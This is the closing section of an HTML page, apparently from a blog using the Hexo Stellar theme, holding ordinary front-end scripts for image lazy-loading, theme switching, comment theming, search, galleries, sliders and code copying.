  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    window.lazyLoadInstance?.update();
  });

  window.wrapLazyloadImages = (container) => {
    if (typeof container === 'string') {
      container = document.querySelector(container);
    }
    if (!container) return;
    
    const images = container.querySelectorAll('img');
    images.forEach((img) => {
      if (img.classList.contains('lazy')) return;

      const src = img.getAttribute('src');
      if (!src) return;

      const wrapper = document.createElement('div');
      wrapper.className = 'lazy-box';

      const newImg = img.cloneNode();
      newImg.removeAttribute('src');
      newImg.setAttribute('data-src', src);
      newImg.classList.add('lazy');

      const icon = document.createElement('div');
      icon.className = 'lazy-icon';
      if (def.loading) {
        icon.style.backgroundImage = `url("${def.loading}")`;
      }

      wrapper.appendChild(newImg);
      wrapper.appendChild(icon);

      img.replaceWith(wrapper);
    });

    // 通知 LazyLoad 更新
    if (window.lazyLoadInstance?.update) {
      window.lazyLoadInstance.update();
    }
  }
  
</script>

<!-- required -->
<script src="/js/main.js?v=1.33.1" defer></script>

<script type="text/javascript">
  const applyTheme = (theme) => {
    if (theme === 'auto') {
      document.documentElement.removeAttribute('data-theme')
    } else {
      document.documentElement.setAttribute('data-theme', theme)
    }

    // applyThemeToGiscus(theme)
  }

  // FIXME: 这会导致无法使用 preferred_color_scheme 以外的主题
  const applyThemeToGiscus = (theme) => {
    // theme = theme === 'auto' ? 'preferred_color_scheme' : theme
    const cmt = document.getElementById('giscus')
    if (cmt) {
      // This works before giscus load.
      cmt.setAttribute('data-theme', theme)
    }

    const iframe = document.querySelector('#comments > section.giscus > iframe')
    if (iframe) {
      // This works after giscus loaded.
      const src = iframe.src
      const newSrc = src.replace(/theme=[\w]+/, `theme=${theme}`)
      iframe.src = newSrc
    }
  }

  const switchTheme = () => {
    // light -> dark -> auto -> light -> ...
    const currentTheme = document.documentElement.getAttribute('data-theme')
    let newTheme;
    switch (currentTheme) {
      case 'light':
        newTheme = 'dark'
        break
      case 'dark':
        newTheme = 'auto'
        break
      default:
        newTheme = 'light'
    }
    applyTheme(newTheme)
    window.localStorage.setItem('Stellar.theme', newTheme)
    utils.dark.mode = newTheme === 'auto' ? (window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light") : newTheme;
    utils.dark.method.toggle.start();

    const messages = {
      light: `Switched to Light Mode`,
      dark: `Switched to Dark Mode`,
      auto: `Switched to Auto Mode`,
    }
    hud?.toast?.(messages[newTheme])
  }

  (() => {
    // Apply user's preferred theme, if any.
    const theme = window.localStorage.getItem('Stellar.theme')
    if (theme !== null) {
      applyTheme(theme)
    } else {
      utils.dark.mode = window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
    }
    utils.dark.method.toggle.start();
  })()
</script>


<!-- optional -->



<script defer>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.services = Object.assign({}, JSON.parse(`{"mdrender":{"js":"/js/services/mdrender.js"},"siteinfo":{"js":"/js/services/siteinfo.js","api":null},"ghinfo":{"js":"/js/services/ghinfo.js"},"rating":{"js":"/js/services/rating.js","api":"https://star-vote.xaox.cc/api/rating"},"vote":{"js":"/js/services/vote.js","api":"https://star-vote.xaox.cc/api/vote"},"sites":{"js":"/js/services/sites.js"},"friends":{"js":"/js/services/friends.js"},"friends_and_posts":{"js":"/js/services/friends_and_posts.js"},"timeline":{"js":"/js/services/timeline.js"},"fcircle":{"js":"/js/services/fcircle.js"},"weibo":{"js":"/js/services/weibo.js"},"memos":{"js":"/js/services/memos.js"},"voice":{"js":"/js/plugins/voice.js"},"video":{"js":"/js/plugins/video.js"},"download-file":{"js":"/js/plugins/download-file.js"},"twikoo":{"js":"/js/services/twikoo_latest_comment.js"},"waline":{"js":"/js/services/waline_latest_comment.js"},"artalk":{"js":"/js/services/artalk_latest_comment.js"},"giscus":{"js":"/js/services/giscus_latest_comment.js"},"contributors":{"edit_this_page":{"_posts/":null,"wiki/stellar/":"https://github.com/xaoxuu/hexo-theme-stellar-docs/blob/main/"},"js":"/js/services/contributors.js"}}`));
    for (let id of Object.keys(ctx.services)) {
      const js = ctx.services[id].js;
      if (id == 'siteinfo') {
        ctx.cardlinks = document.querySelectorAll('a.link-card[cardlink]');
        if (ctx.cardlinks?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            setCardLink(ctx.cardlinks);
          });
        }
      } else if (id == 'voice') {
        ctx.voiceAudios = document.querySelectorAll('.voice>audio');
        if (ctx.voiceAudios?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            createVoiceDom(ctx.voiceAudios);
          });
        }
      } else if (id == 'video') {
        ctx.videos = document.querySelectorAll('.video>video');
        if (ctx.videos?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            videoEvents(ctx.videos);
          });
        }
      } else if (id == 'download-file') {
        ctx.files = document.querySelectorAll('.file');
        if (ctx.files?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            downloadFileEvent(ctx.files);
          });
        }
      } else {
        const els = document.getElementsByClassName(`ds-${id}`);
        if (els?.length > 0) {
          utils.jq(() => {
            if (id == 'timeline' || 'memos' || 'marked') {
              utils.js(deps.marked).then(function () {
                utils.js(js, { defer: true });
              });
            } else {
              utils.js(js, { defer: true });
            }
          });
        }
      }
    }

    // chat iphone time
    let phoneTimes = document.querySelectorAll('.chat .status-bar .time');

    if (phoneTimes.length > 0) {
      NowTime();
      var date = new Date();
      var sec = date.getSeconds();
      var firstAdjustInterval = setInterval(firstAdjustTime, 1000 * (60 - sec));
    }

    function firstAdjustTime() {
      NowTime();
      clearInterval(firstAdjustInterval);
      setInterval(NowTime, 1000 * 60);
    }

    function NowTime() {
      for (let i = 0; i < phoneTimes.length; ++i) {
        var timeSpan = phoneTimes[i];
        var date = new Date();
        var hour = date.getHours();
        var min = date.getMinutes();
        timeSpan.innerHTML = check(hour) + ":" + check(min);
      }
    };

    function check(val) {
      if (val < 10) {
        return ("0" + val);
      }
      return (val);
    }

    // chat quote
    const chat_quote_obverser = new IntersectionObserver((entries, observer) => {
      entries.filter((entry) => { return entry.isIntersecting }).sort((a, b) => a.intersectionRect.y !== b.intersectionRect.y ? a.intersectionRect.y - b.intersectionRect.y : a.intersectionRect.x - b.intersectionRect.x).forEach((entry, index) => {
          observer.unobserve(entry.target);
          setTimeout(() => {
            entry.target.classList.add('quote-blink');
            setTimeout(() => {
              entry.target.classList.remove('quote-blink');
            }, 1000);
          }, Math.max(100, 16) * (index + 1));
        });
    });

    var chatQuotes = document.querySelectorAll(".chat .talk .quote");
    chatQuotes.forEach((quote) => {
      quote.addEventListener('click', function () {
        var chatCellDom = document.getElementById("quote-" + quote.getAttribute("quotedCellTag"));
        if (chatCellDom) {
          var chatDiv = chatCellDom.parentElement;
          var mid = chatDiv.clientHeight / 2;
          var offsetTop = chatCellDom.offsetTop;
          if (offsetTop > mid - chatCellDom.clientHeight / 2) {
            chatDiv.scrollTo({
              top: chatCellDom.offsetTop - mid + chatCellDom.clientHeight / 2,
              behavior: "smooth"
            });
          } else {
            chatDiv.scrollTo({
              top: 0,
              behavior: "smooth"
            });
          }
          chat_quote_obverser.observe(chatCellDom);
        }
      });
    });
  });
</script>

<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.search = {
      path: `/search.json`,
    }
    utils.js('/js/search/local-search.js', { defer: true });
  });
</script><script>
  window.FPConfig = {
    delay: 0,
    ignoreKeywords: [],
    maxRPS: 5,
    hoverDelay: 25
  };
</script>
<script defer src="https://gcore.jsdelivr.net/npm/flying-pages@2/flying-pages.min.js"></script><script>
  ctx.fancybox = {
    selector: `.timenode p>img`,
    css: `https://gcore.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.css`,
    js: `https://gcore.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.umd.js`
  };
  var selector = '[data-fancybox]:not(.error), .with-fancybox .atk-content img:not([atk-emoticon])';
  if (ctx.fancybox.selector) {
    selector += `, ${ctx.fancybox.selector}`
  }
  var needFancybox = document.querySelectorAll(selector).length !== 0;
  if (!needFancybox) {
    const memos = document.getElementsByClassName('ds-memos');
    if (memos != undefined && memos.length > 0) {
      needFancybox = true;
    }
    const fancybox = document.getElementsByClassName('with-fancybox');
    if (fancybox != undefined && fancybox.length > 0) {
      needFancybox = true;
    }
  }
  if (needFancybox) {
    utils.css(ctx.fancybox.css);
    utils.js(ctx.fancybox.js, { defer: true }).then(function () {
      Fancybox.bind(selector, {
        hideScrollbar: false,
        Thumbs: {
          autoStart: false,
        },
        caption: (fancybox, slide) => {
          return slide.triggerEl.alt || slide.triggerEl.dataset.caption || null
        }
      });
    })
  }
</script>
<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    const swiper_api = document.getElementById('swiper-api');
    if (swiper_api != undefined) {
      utils.css(`https://unpkg.com/swiper@10.3/swiper-bundle.min.css`);
      utils.js(`https://unpkg.com/swiper@10.3/swiper-bundle.min.js`, { defer: true }).then(function () {
        const effect = swiper_api.getAttribute('effect') || '';
        var swiper = new Swiper('.swiper#swiper-api', {
          slidesPerView: 'auto',
          spaceBetween: 8,
          centeredSlides: true,
          effect: effect,
          rewind: true,
          pagination: {
            el: '.swiper-pagination',
            clickable: true,
          },
          navigation: {
            nextEl: '.swiper-button-next',
            prevEl: '.swiper-button-prev',
          },
        });
      })
    }
  });
</script>
<script>
  document.addEventListener('DOMContentLoaded', function () {
    window.codeElements = document.querySelectorAll('.code');
    if (window.codeElements.length > 0) {
      ctx.copycode = {
        default_text: `Copy`,
        success_text: `Copied`,
        toast: `复制成功`,
      };
      utils.js('/js/plugins/copycode.js');
    }
  });
</script>


<!-- inject -->

</div></body></html>
